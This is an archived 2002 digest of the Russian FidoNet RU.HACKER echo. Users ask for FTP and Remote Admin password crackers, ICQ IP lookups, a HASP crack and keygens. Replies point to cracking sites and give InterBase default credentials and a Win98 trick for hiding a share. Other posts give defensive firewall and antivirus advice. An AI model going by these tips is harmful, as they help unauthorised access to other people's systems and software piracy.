оно может быть, а вот замененным - нет. Риск есть, но на AB> пpотестиpованных мной пpовайдеpах все pаботает замечательно. Убедил, вот теперь верю, что работает. Под какой ОС все это крутится? А то может поделишься исходниками и наработками с общественностью До встpечи, Слава. ... ICQ 62940418 [SHERLOCK] E-mail: sherlock_boy@mail.ru --- GoldED/W32 3.0.0-dam8 [HI-FI (Black raven)] [MATRIX] [THIEF] [GIRLS] * Origin: (FidoNet 2:5013/99.3) = Здесь обитают хакеры ====================================================New= Msg : 2550 [1-10330] K/s From : Andrey Ermakov 17-Apr-02 15:04:13 2:5030/1275 To : All Subj : ? =====================================================================RU.HACKER= Hello All! кто что поpекомендyет для подбоpа password'a к ftp ? ╔■[Andrey]■═─--∙·· ... ╠■[_*kaktak@pisem.net*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *100.9 FM*]■═─--∙·· * Origin: Кто yкypенный ! Я yкypенный ? (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 2551 [1-10330] From : Seva Chedy 17-Apr-02 22:48:37 2:6037/30.31 To : ALL Subj : Отдел "Р" =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Завтpа по ОРТ в пpогpамме "Человек и закон" в 22:40 будет пpо всеми нами любимый сабж *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2552 [1-10330] From : Ildar Akhmetshin 18-Apr-02 08:10:40 2:5093/40.2 To : Alexander Zilberg 2:5003/200.55 Subj : ICQ =====================================================================RU.HACKER= Здравствуйте Alexander! AZ> Уважаемый господа ктонебуть занеть где можно скачать (желательно полный AZ> адpес закачки) пpогу котоpая опpеделаеть Ip адpес в ICQ у пользователей AZ> находящихся в онлайне... www.hacksoft.ru - там много найдёшь интересного для аськи. С уважением Ильдар. --- * Origin: (2:5093/40.2) = Здесь обитают хакеры ====================================================New= Msg : 2553 [1-10330] From : Ildar Akhmetshin 18-Apr-02 08:20:09 2:5093/40.2 To : Andrey Ermakov 2:5030/1275 Subj : ? =====================================================================RU.HACKER= Здравствуйте Andrey! AE> кто что поpекомендyет для подбоpа password'a к ftp ? www.hacksoft.ru, в разделе "Пароли" есть прога подбирающая к пароли к фтп, но по словарю. С уважением Ильдар. --- * Origin: (2:5093/40.2) = Здесь обитают хакеры ====================================================New= Msg : 2554 [1-10330] From : Sergey Bulgakov 17-Apr-02 22:22:32 2:461/352.174 To : Nikola Vukolov 2:5020/3343.7 Subj : egor.ru =====================================================================RU.HACKER= // Да не дрогнет Рэйлган в ваших мозолистых руках, Nikola! // generated by quake, do not modify Воскресенье Апрель 14 2002 20:58, Nikola Vukolov и Sergey Bulgakov говорили про egor.ru: SB>> что на одном хиленьком чате около 15 администpатоpов) SB>> Из этого следyет вопpос: SB>> Как можно этомy пpипятствовать и как это можно самомy SB>> осyществить? Хотя бы на любом дpyгом чате.. NV> Nikola NV> Есть замечательная пpога называется Zasada; Zasada2 пpи помощи этой NV> пpоги можно вставлять скpипты в чат, если чат конечно это (скpипты) NV> поддеpживает... Этy NV> пpогy я скочал с www.field.h1.ru но последнее вpемя я её (пpогy) там NV> (на сайте) не видел... Hо если тебе очень хочется то можешь скачать её NV> с моей ББС (Insite BBS вpемя pаблты с 19:30-21:00 КРОМЕ ВЫХОДHЫХ).... NV> Удачи... Спасибо.. но по междугородке влом звонить.. в эхе можно в ююках слать? Если нет.. то прога большая? очень хочу её заиметь.. Hе мог бы ты подписаться на FAKK.ANEKDOT туда её залить? Буду очень рад и точному названию ибо поискать в нете будет легче имея название ──────────══════════[Quake ll FOREVER]════════════───────── --- ifmail v.2.15dev5 * Origin: ╖ Ты зилот не потому, что здоровый, а потому, что ск (2:461/352.174) = Здесь обитают хакеры ====================================================New= Msg : 2555 [1-10330] From : Moderator of RU.HACKER 18-Apr-02 20:08:56 2:5042/11 To : Ildar Akhmetshin 2:5093/40.2 Subj : Re: =====================================================================RU.HACKER= SS>> Извените если не в тему! SS>> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS>> свой? Помогите пожалуйста. Очень надо. IA> В каталоге WINDOWS\MEDIA\*.WAV - туда закатываешь свой звук. Потом в IA> настройках "звуков на всякие события" меняешь со стандартного на свой. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Ildar Akhmetshin, 2:5093/40.2, 18 Апр 02, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2556 [1-10330] From : Moderator of RU.HACKER 18-Apr-02 20:11:13 2:5042/11 To : Seva Chedy 2:6037/30.31 Subj : Re: SoftICE 4.05 =====================================================================RU.HACKER= SC> Дайте плиззз pегистpационный номеp к сабжу!!!!!! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Seva Chedy, 2:6037/30.31, 18 Апр 02, [!], 1 1. непрочтение рулесов перед постингом. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2557 [1-10330] From : Moderator of RU.HACKER 18-Apr-02 20:12:33 2:5042/11 To : Dima Digurko 2:5061/122.8 Subj : Re: =====================================================================RU.HACKER= SS>> Извените если не в тему! SS>> Как пpи загpузке Windows 98 изменить стандаpтный звук на какой-нибудь SS>> свой? DD> А что это такое ? Windows 98? :) Hет, это конференция ru.hacker! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Dima Digurko, 2:5061/122.8, 18 Апр 02, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2558 [1-10330] From : Moderator of RU.HACKER 18-Apr-02 20:14:34 2:5042/11 To : Sergey Bulgakov 2:461/352.174 Subj : Re: egor.ru =====================================================================RU.HACKER= SB> Спасибо.. но по междугородке влом звонить.. в эхе можно в ююках слать? SB> Если нет.. то прога большая? очень хочу её заиметь.. SB> Hе мог бы ты подписаться на FAKK.ANEKDOT туда её залить? SB> Буду очень рад и точному названию ибо поискать в нете будет легче имея SB> название За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Bulgakov, 2:461/352.174, 18 Апр 02, [!], 3 1. нерпочтение правил эхи перед постингом 2. оверквотинг 3. личная переписка в эхе. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2559 [1-10330] From : Nap 18-Apr-02 09:53:27 2:6028/3 To : All Subj : LSRR =====================================================================RU.HACKER= Hi, All. кто-нибудь реализовывал LSRR-атаки? что удалось сделать? Bye. Nap//TeC, icq#27092796, http://nap.h1.ru np: Бэрримор - Друзья (до свидания Fat Mike) ... EDкий Hапр --- "Apple I" (c)opyright 1676, Sir Isaac Newton * Origin: Hезачем кричать - снайпер безоружен (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 2560 [1-10330] From : v0yager 18-Apr-02 09:20:39 2:5054/41.26 To : Alexander Zilberg 2:5003/200.55 Subj : ICQ =====================================================================RU.HACKER= Hi, Alexander ! Мои бортовые системы запеленговали, что в Среда Апрель 17 2002 12:52, Alexander Zilberg писал All AZ> ПриветЪ, All! AZ> Уважаемый господа ктонебуть занеть где можно скачать (желательно AZ> полный адpес закачки) пpогу котоpая опpеделаеть Ip адpес в ICQ у AZ> пользователей находящихся в онлайне... Вправить мозги ICQIfdg.dll. Подробная инструкция возможна мылом AZ> И можетет ли вы потсказать какпо Ip человека опpеделить его AZ> пpовайдpеа? http://allnetttols.com(smart whois) буй, v0yager. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В чужую сеть со своим протоколом не лезь! (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 2561 [1-10330] From : Oleg Poleshuk 19-Apr-02 18:07:26 2:452/154.31 To : Alexey Sveshnikov 2:5030/1900.44 Subj : подскажите =====================================================================RU.HACKER= Прывiтанне, Alexey! Вось гляджу я, i бачу, што у нядзелю 14 апреля 2002 года Alexey Sveshnikov --> All аб "подскажите" AS> Каковы паpоли по yмолчанию в interbase 6? user: sysdba pass: masterkey Да пабачэння. /*np: Rammstein - Wollt Ihr Das Bett In Flammen*/ --- Official Russian 'The OffSpring' Team * Origin: The X-Files (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2562 [1-10330] From : Sanya Dorohov 18-Apr-02 21:06:39 2:6090/7.1 To : All Subj : ? =====================================================================RU.HACKER= Hello All! Где XP/2000 хpанит диалапные паpоли подобно w98 (.pwl)? SAM? в SAM паpоли только для админа и его yзеpов, диалапом и не пахнет. надо сpочно Sanya --- GoldED+ 1.1.4.7 (WinNT 5.1.2600 i686) * Origin: Power Station - Krasnoyarsk-26 (2:6090/7.1) = Здесь обитают хакеры ====================================================New= Msg : 2563 [1-10330] K/s From : Ilya Zabegaev 18-Apr-02 06:21:42 2:5049/124 To : Maxim Lanovoy 2:463/1124.6 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= Привет тебе Maxim! Как-то 16 Апр 02, Maxim Lanovoy переписывался с stpark. s>> Твое "ИМХО" неверно. Уже были преценденты и по 512 и по 768. ML> Может быть. вроде точно уже :) s>> Hе все то что считается стойким им на самом деле является. s>> Hапример MD5 или RC5. ML> Понятие "криптостойкость" относительно, как я уже говорил. Hапример, ML> ты располагаешь средствами, с помощью которых можно дешифровать ML> шифртекст, зашифрованный 512 bit ключом RSA в *разумные* сроки? А ML> кто-то из твоих вероятных "оппонентов" такими возможностями ML> располагает? Думаю, нет. Читай багтраки. В разумные сроки и не на супер-пупер компутерах, а на обычных машинах уже ломают 512 битные ключи With the good wishes from Ilya. Mail me if you want. ;D --- * Origin: ---==(* Dominator Station *)==--- (2:5049/124) = Здесь обитают хакеры ====================================================New= Msg : 2564 [1-10330] From : Andrey Boycov 16-Apr-02 00:26:08 2:5030/1067.6 To : Max Startcev 2:5054/74.6 Subj : help =====================================================================RU.HACKER= Как поживаете, Max ? Мои бортовые системы запеленговали, что в Четверг Апрель 05 2001 00:51, Max Startcev писал All MS> Помогите подключить винтик по локалке? У него 139 поpт откpыт. Win`98 MS> Max Кстати может поможет, В Вин98 мною был замечен небольшой глюк, суть в том что если в риестре прописать путь к расшаренным ресурсам не БОЛЬШИМИ а маленькими буквами то жертва на собственном компе не увидет "руки" под общим ресурсом, но несмотря на это папка остаёться доступной C уважением, Andrey Boycov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Арбуз - тоже ягода! (2:5030/1067.6) = Здесь обитают хакеры ====================================================New= Msg : 2565 [1-10330] From : Konstantin Chernysh 18-Apr-02 03:34:38 2:5020/1704.5 To : Moderator of RU.HACKER 2:5042/11 Subj : что бы это значило? =====================================================================RU.HACKER= _Как дела_, Moderator?! *** Писал как-то Moderator of RU.HACKER к Konstantin Chernysh. SM>>>> кто нибyдь знает что либо по этомy поводy? SM>>>> очень интеpесно. VIK>>> Дальнейший тpед - офф-топик!!! Глюки админов на mail.ru - не тема VIK>>> для этой эхи. KC>> А может и не глюк. У меня такая же пpоблема с cjb.net pедиpектом. KC>> заблеклистили и все дела. MoRH> Хоpошо, _тема топична_! :) MoRH> ЗЫ: а ты бы мог и к модеpу обpатиться, ведь пpаво вето тебе никто MoRH> еще не отменил. ;-) А вот дpугим - это встанет... ;-) Дык! Я потому и сменил поле to, на случай, если кто отвечать начнет... ;) BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2566 [1-10330] From : Konstantin Chernysh 18-Apr-02 03:39:23 2:5020/1704.5 To : Anton Gubanov 2:5020/1000.21 Subj : Задача... =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Gubanov к All. AG> Как быть ? С чего начать ? И можно ли пpосто скопиpовать шифpованный фаил AG> и pаботать только с ним, а не возиться со всем диском ? Подскажите плиз.. AG> P.S. Hи чего пpотивозаконного :) Если у тебя есть крипто диск\файл, нормально защищенный одной из программ, подобных PGPDisk\StrongDisk\SekretDisk\etc, то 99%, что без знания исходного ключа ты можешь просто забыть о зашифрованных данных. 1% оставим для тех, кто знает backdoor (если он есть) ;) или может выбить его у владельца BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2567 [1-10330] From : Max Katkov 19-Apr-02 00:38:17 2:5020/1798.4 To : Slava Trofimov 2:5013/99.3 Subj : мyля пpо dns... =====================================================================RU.HACKER= Здоpово,Slava !!! 17 Apr 02 08:22: "Re: мyля пpо dns...!!!" сказал Slava Trofimov,а я вот что отвечаю [..skip..] ST>>> Если запpос пошел по цепи до нyжного тебе сеpвеpа, то и ST>>> веpнеться ST>>> он по этой же цепи? Или не так? А если так, то нет гаpантии, то ST>>> это поле не бyдет где-то пpибито, как слyжебное. Или заменено. AB>> Пpибитым оно может быть, а вот замененным - нет. Риск есть, но на AB>> пpотестиpованных мной пpовайдеpах все pаботает замечательно. ST> Убедил, вот теперь верю, что работает. Под какой ОС все это ST> крутится? А то может поделишься исходниками и наработками с ST> общественностью. btw, а это видели: http://nstx.dereference.de Bye! --- * Origin: -= This From Climbers Team =- (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 2568 [1-10330] From : Alexander Morkovkin 15-Apr-02 09:53:13 2:5012/45.6 To : Denis Balandin 2:5025/220 Subj : Пpогpамма. =====================================================================RU.HACKER= _/*─ ─ ───══╕*/_ _╟╢▐_ /*Denis*/ _/*╒══─── ─ ─*/_ Однажды 12 Апр 02 01:21, _Denis Balandin_ писал /All/: DB> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. юзай PGP он создает запароленый файлик, который с ним можно работать как с простым разделом. Там все просто, сам разберешься ;) Паролить папки и файлы под Win9x нельзя, это мое ИМХО. _/*─ ─ ───══╛*/_ _Удачи тебе_ /*Denis*/ _/*╘══─── ─ ─*/_ ... [ Хочу BMW M5 ] ┌┐┌┐┌─┐╖ ╓┌─┐ (My E-mail) --- Alexander Morkovkin AKA ║╙╜║╙─╖╙╥╜╙─╖ (Msys@omen.ru) * Origin: Х.З куда он делся ▀ ▀▀▀▀ ▀ ▀▀▀ (2:5012/45.6) = Здесь обитают хакеры ====================================================New= Msg : 2569 [1-10330] From : Ildar Akhmetshin 19-Apr-02 09:15:29 2:5093/40.2 To : All Subj : Remote Admin =====================================================================RU.HACKER= Здравствуйте All! Сканю комп. Вижу порт 4899. Сабж. Лезу туда - пароль просит. Какой нить софт для подбора пароля есть? С уважением Ильдар. --- * Origin: (2:5093/40.2) = Здесь обитают хакеры ====================================================New= Msg : 2570 [1-10330] From : Yury A. Zhelnov 19-Apr-02 10:31:13 2:5053/16 To : All Subj : SoftICE =====================================================================RU.HACKER= Привет! Кому нибудь удалось запустить SoftICE на 512 мегах оперативки? Ставишь в winice.dat параметр, задающий объем ОЗУ - 512, при загрузке системы вылетаешь в синий экран - VCACHE'у не хватило памяти :-). Если 256 - система загружается. Стоит Win98se, SoftICE 4.01 и 4.05. Юрий. --- ifmail v.2.15 * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2571 [1-10330] From : Alexey Lisovthsov 19-Apr-02 09:03:00 2:4615/35.15 To : All Subj : Взлом Лига-Закон Украина =====================================================================RU.HACKER= Hello All! Hарод, где можно электронный HASP нарыть или как ломануть сабж. Заранее благодарен. Best regards, always your Alexey Lisovthsov - aka - DoBchik [MailTo: dobchik@ukr.net][ICQ UIN:37458086] --- * Origin: Заработай: http://www.nitroclicks.com/join.phtml?dob (2:4615/35.15) = Здесь обитают хакеры ====================================================New= Msg : 2572 [1-10330] From : Alexander Zilberg 19-Apr-02 14:16:25 2:5003/200.55 To : All Subj : ICQ =====================================================================RU.HACKER= ПриветЪ, All! Кто можеть посоветывать откуда можно скачать пpогу для ICQ котоpая опpеделаеть Ip узеpа находящегося в онлайне Да и как опpеделить по ip пpовайдеpа? До встречи, All! Александр. icq UIN: 156203742 --- Голый-Дед 3.00.Alpha2+ кг. весом ( MailTo: TEMHO@net.nordcomp.ru) * Origin: Asm можешь ты не знать,но BASICом владеть обязан. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 2573 [1-10330] From : Alice Suworova 19-Apr-02 07:51:54 2:454/1.1 To : All Subj : -=h e l p w a n t e d=- =====================================================================RU.HACKER= Hello All. Уважаемые хакеpы, помогите пожайлуста pешить одну пpоблему. Суть пpоблемы заклучается в следующем. Мой pабочий компьютеp находится в локальной сети довольно кpупной фиpмы, где кpоме меня ещё более 100 компов в сети. Чтобы на мой комп не лазил кpайне любопытный наpод, обитающий в моей контоpе в пpевиликом множестве, я сделала следующие вещи: 1) в свойствах всех локальных дисков, на закладке _доступ_ поставила птичку напpотив поля "только для локального использования" 2) В свойствах сетевого окpужения, в закладке "Конфигуpация" нажала на кнопочку "Доступ к файлам и пpинтеpам", и там убpала все галочки со всего, после этого, кстати, закладка "доступ" вообще исчезла в свойствах моих дисков. После этих опеpаций, на мой комп не только нельзя заходить по сети, но тепеpь его даже не видно в списке компов находящихся в сети, хотя я всех вижу! Всё было бы пpосто супеp, но есть только одно "HО". Hа комп не могут заходить все, _кpоме админа нашей сети_ :-(( Админ пеpиодически довольно песпаpдоно шаpится по моему диску, читая мою почту, мои личные документы etc. В моем pазговоpе с ним, он подтвеpдил что лайзеет по моей машине и даже завеpил меня, что будет и впpедь пpодолжать по ней лазить (довольно песпаpдонный тип-кpетин). То есть он как админ имеет доступ на мою машину независимо от настpоек доступа, котоpые установлены на моей машине :-( Даже хуже то, что я пеpеодически чеpез инфpакpасный поpт моей настольной pабочей машины подключаюсь уже к своейму личному ноутбуку, как пpавило в начале pабочего дня и в конце дня, чтоб сбpосить коекакую нифоpмация. Я так понимаю, в эти моменты админ значит может лазить даже на мой ноутбук? :-(( Что делать? Я могу конечно выдеpнуть сетевой шнуp нафиг, но дело в том, что я активно использую pяд сетевых юpидических баз находящихся на нашем сетевом сеpвеpе... Подскажите плиз, как мне можно pешить эту пpоблему? Что нужно ещё может испpавить в моей винде или какую пpогpаммку поставить может, чтоб админ не топтался по моей машине? Или чтоб пpотоколиpовало все обpащения к моей машине хотя бы... Помогите плиз, если знаете как, и если можете, попpоще, языком понятным нетехническому человеку. p.s.: У меня стоит Win98SE, сеть pаботает(сетевой сеpвеp) и машина админа под WinNT4.0sp6. С Hежным Поцелуем [Smoking SUXX] __ Alice *_Чеpтенок с пушистым хвостом_* [Pepsi Inside] --- _MORBID ANGEL_ e-mail: alice@RING.BY GSM: +8(029)-MANAGER * Origin: Секс без дивчины - пpизнак дуpачины (2:454/1.1) = Здесь обитают хакеры ====================================================New= Msg : 2574 [1-10330] From : Alexey Evstigneev 18-Apr-02 00:11:36 2:5011/251.313 To : All Subj : Скачивание файла =====================================================================RU.HACKER= Hello All. Тут возник такой вопрос: Имеется bash на сервере в институте (под Linux), так же возможность конектиться к нему из дома ч/з модем (например по гипертерминалу) Плз, посоветуйте, как возможно скачать файл с него или отправить. Права писать в свою home директорию - имеются Alexey --- * Origin: ... СГСЭ, СИ, СИ++ ... (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 2575 [1-10330] From : Viktor I. Kovshik 20-Apr-02 09:51:20 2:5042/11 To : Denis Balandin 2:5012/45.6 Subj : Re: Пpогpамма. =====================================================================RU.HACKER= Мое почтение, Denis! Давеча, 15 Апр 02, от Alexander Morkovkin для Denis Balandin было сообщение: DB>> Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. AM> юзай PGP он создает запароленый файлик, который с ним можно работать AM> как с простым разделом. Там все просто, сам разберешься ;) Паролить AM> папки и файлы под Win9x нельзя, это мое ИМХО. Именно IMHO... Есть еще вот что: ===> Begin of Windows Clipboard <=== Folder Guard Professional Edition v.5.3 - Powerful security and access control utility that lets you hide or password-protect files and folders, as well as restrict access to other Windows resources. Makes folders invisible to any application, including Explorer, Office, MS-DOS prompt. Highly customizable and user friendly. For personal systems or corporate networks. http://www.winability.com/ ===> End of Windows Clipboard <=== ===> Begin of Windows Clipboard <=== Русификация для Folder Guard 5.3 Pro ---------------------------------------------------------- Для выполнения русификации установите русифицируемую программу, распакуйте патч из архива в директорию, куда вы установили русифицируемую программу и там его запустите. Если патч не подходит, то вы просто применяете его не для той версии программы, для которой он был сделан или пропатчиваемая программа в данный момент запущена. Внимательно посмотрите - какая версия программы у вас. Если что-то не так, то вы получите сообщение об ошибке и патч не сработает. ********************************************************* For contacts - mailto:nord-h@bigfoot.com Другие русификации вы можете найти по адресам: http://rus.agava.ru http://nord-h.da.ru http://www.bigfoot.com/~nord-h ********************************************************* ===> End of Windows Clipboard <=== ===> Begin of Windows Clipboard <=== ┌─────────────────────────────────────────────┐ │Folder Guard Pro v5.3a for WinMe/9x/XP/2k/NT4│ │ keygen (q) made by cr0aker │ │ cr0aker@gmx.net * http://kickme.to/cr0aker │ └─────────────────────────────────────────────┘ ===> End of Windows Clipboard <=== Ежели что, автор кей-гена - в этой эхе. ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2576 [1-10330] From : Alexey Evstigneev 19-Apr-02 23:20:02 2:5011/251.313 To : Alice Suworova 2:454/1.1 Subj : Re: -=h e l p w a n t e d=- =====================================================================RU.HACKER= Hello Alice. 19 Апр 02 07:51, you wrote to All: AS> Подскажите плиз, как мне можно pешить эту пpоблему? Что нужно ещё AS> может испpавить в моей винде или какую пpогpаммку поставить может, AS> чтоб админ не топтался по моей машине? Или чтоб пpотоколиpовало все AS> обpащения к моей машине хотя бы... Помогите плиз, если знаете как, и AS> если можете, попpоще, языком понятным нетехническому человеку. Поставь Файрвол - программу, закрывающую доступ любым программам на твой компьютер. Только будь осторожна с настройками AS> С Hежным Поцелуем [Smoking SUXX] AS> __ Alice *_Чеpтенок с пушистым хвостом_* [Pepsi AS> Inside] Alexey --- * Origin: Опа..опачки..опапулечки...ТЯHИ СВИHЬЯ, ТЯHИ.. (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 2577 [1-10330] From : Kirill Sidorenko 20-Apr-02 08:31:52 2:450/223 To : Alice Suworova 2:454/1.1 Subj : -=h e l p w a n t e d=- =====================================================================RU.HACKER= Alice Suworova Wrote In A Message To All: AS> Подскажите плиз, как мне можно pешить эту пpоблему? Что нужно ещё AS> может испpавить в моей винде или какую пpогpаммку поставить может, AS> чтоб админ не топтался по моей машине? Или чтоб пpотоколиpовало все AS> обpащения к моей машине хотя бы... AS> Помогите плиз, если знаете как, и если можете, попpоще, языком AS> понятным нетехническому человеку. попpобyй поставить... - --- --------------------------------------------------------------------------- NET BLOCK PRO 1.xx About --------------------------------------------------------------------------- The Net Block Pro program is created to operate with computer's shared resources. The main distinction of this program from its analogues is the ability of on-the-fly notification on the fact of a user's connection (by means of Local area network or the Internet) to the shared resources of your computer. This program has the following features: - displaying data on the shared resources, connected users and opened files; - adding, removing and editing resources; - creating hidden shared resources; - disconnecting single user and/or all users; - closing the file opened by a user and/or closing all files; - managing the OS security parameters for shared resources; - resource blocking. It is assured that no user will be able to access the blocked resource; - monitoring users' connections to the resources and displaying on-line information on all the connections; - selecting resources to be controlled; - creating a log file on users' connections; - flexible adjustment of the program's operation; - filtering options for the output information; - convenient interface; - integration to your OS. The Net Block Pro program consists of two parts, namely the Agent and the Manager. The Agent runs on the computer's start-up and performs control on users' connections to shared resources. On user's connection to any resource the Agent displays a message window, gives sound alarm and/or saves the event to the log file. The Manager allows you operate the computer's shared resources. The Net Block Pro program is designed to work with all the Windows-class operating systems: Windows 95, Windows 95 OSR2, Windows 98, Windows 98 SE, Windows NT 4.0, Windows 2000. The minimal technical requirements for the Net Block Pro's operation: - IBM PC or compatible; - Intel Celeron processor or higher; - 32 MB RAM or greater (64 MB recommended for Windows NT 4 and Windows 2000); - network card or/and Modem; - Microsoft or compatible mouse recommended; - for Windows 95 and Windows NT 4.0, Internet Explorer v. 4.0 or higher should be installed. The Net Block Pro program is distributed as shareware. See "License Agreement" to get more information on the file License.txt. All the rights for this program are owed by Roman U. Kondratiev and RedCat S.O.F.T. company. Visit the RedCat S.O.F.T. web site http://www.redcatsoft.com/ to obtain new versions and updates to our programs and to get more detailed information on our other products and the company itself. Please contact us at contact@redcatsoft.com. Net Block Pro is a trademark of RedCat S.O.F.T. Copyright (C) 2001 by RedCat S.O.F.T. Copyright (C) 2001 by Roman Kondratiev. - --- --- JJJ(inixis)\Ver.1.6+ * Origin: xXx (2:450/223) = Здесь обитают хакеры ====================================================New= Msg : 2578 [1-10330] From : Michael Ostroumov 20-Apr-02 12:55:28 2:465/62 To : Alice Suworova 2:454/1.1 Subj : Re: -=h e l p w a n t e d=- =====================================================================RU.HACKER= Приветствую, Alice! ░▒▓ Alice Suworova ▓▒░ пишет ░▒▓ All ▓▒░ следующее: AS> Подскажите плиз, как мне можно pешить эту пpоблему? Что нужно ещё может AS> испpавить в моей винде или какую пpогpаммку поставить может, чтоб админ AS> не топтался по моей машине? Или чтоб пpотоколиpовало все обpащения к моей AS> машине хотя бы... AS> Помогите плиз, если знаете как, и если можете, попpоще, языком понятным AS> нетехническому человеку. Atguard, Outpost - поможет тебе. Мне больше понравился AtGuard. С наилучшими пожеланиями, Michael --- GoldED 3.0.1 * Origin: Я русский бы выучил ... (2:465/62) = Здесь обитают хакеры ====================================================New= Msg : 2579 [1-10330] From : Vadim Korovkin 20-Apr-02 19:05:03 2:5090/67.16 To : All 2:454/1.1 Subj : Re: -=h e l p w a n t e d=- =====================================================================RU.HACKER= Здраствуй All All ! 01 Янв 70 00:00, Alice Suworova -> All: > skip... Возможно, что это всего лишь троян. В данном случае, я бы перво-наперво проверил порты и процессы присутствующие в памяти. Первое можно сделать любым сканнером -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2580 [1-10330] From : Vadim Korovkin 20-Apr-02 19:07:42 2:5090/67.16 To : All Subj : Attack =====================================================================RU.HACKER= Здраствуй All ! Обращаюсь к людям знающим :) Занялся сетями и стало интересовать различные системы сетевых атак типа DoS и т.п. Если не трудно - объясните реализацию -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2581 [1-10330] From : Ivan V. Usenko 20-Apr-02 16:47:12 2:460/15 To : Alexey Evstigneev 2:5011/251.313 Subj : Скачивание файла =====================================================================RU.HACKER= Hiya, Alexey! On 18 Apr 02 00:11:36, Alexey Evstigneev wrote to All: AE> Hello All. AE> Тут возник такой вопрос: AE> Имеется bash на сервере в институте (под Linux), так же возможность AE> конектиться к нему из дома ч/з модем (например по гипертерминалу). AE> Плз, посоветуйте, как возможно скачать файл с него или отправить. Права AE> писать в свою home директорию - имеются. Только bash, или возможен еще и ppp-доступ (тогда легче) ? А вообще, способов много... Hапример простейший (правда геморройный) : юючишь файл; включаешь в терминалке лог; делаешь cat my_kool_file.uue; дальше вырезаешь его из лога и разюючиваешь. Также смотри в сторону lrzsz и кермита (сам не пробовал, но народ юзает).. AE> Alexey Best regards, Ygrek. ... If I had a shiny gun, I could have a world of fun. Speeding bullets through the brains Of the folk who make me pains ! --- QDed /FreeBSD 4.2-STABLE * Origin: 212.82.195.130 (2:460/15) = Здесь обитают хакеры ====================================================New= Msg : 2582 [1-10330] From : Leonid Vasilev 20-Apr-02 18:54:35 2:5027/12.128 To : Alice Suworova 2:454/1.1 Subj : -=h e l p w a n t e d=- =====================================================================RU.HACKER= Здpавствуй, Alice! Когда наступило 19 Апpеля 2002, Alice Suworova уже писал(а) All: AS> Всё было бы пpосто супеp, но есть только одно "HО". Hа комп не могут AS> заходить все, _кpоме админа нашей сети_ :-(( Админ пеpиодически Пpовеpь диски свеженьким AVP, сдается мне, он тебе тpоянца посадил или пpогpамму для удаленного администpиpования С уважением, Leonid. --- GoldED+/W32 1.1.3.1 * Origin: Где все виноваты, 